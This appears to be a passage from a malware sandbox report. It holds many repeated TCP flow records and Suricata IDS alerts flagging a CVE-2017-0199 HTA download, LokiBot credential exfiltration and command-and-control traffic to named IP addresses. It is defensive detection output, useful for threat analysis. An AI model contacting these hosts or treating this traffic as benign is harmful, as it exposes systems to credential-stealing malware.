Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 66.63.187.231:80 -> 192.168.2.22:49169
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49179 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49179 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49179 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49172 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49172 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49172 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49173 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49173 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49173 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49179 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49190 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49179 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49190 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49185 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49185 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49185 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49172 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49185 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49185 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49179
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49190 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49180 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49190 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49181 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49190 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49174 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49174 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49177 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49177 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49188 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49174 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49180 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49181 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 66.63.187.231:80 -> 192.168.2.22:49170
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49181 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49177 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49176 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49198 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49177 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49177 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49198 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49192 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49180 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49192 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49188 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49192 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49188 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49185
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49190
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49174 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49196 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49177
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49173 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49174 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49173 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49198 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49186 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49194 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49187 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49194 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49194 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49187 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49199 -> 94.156.177.41:80
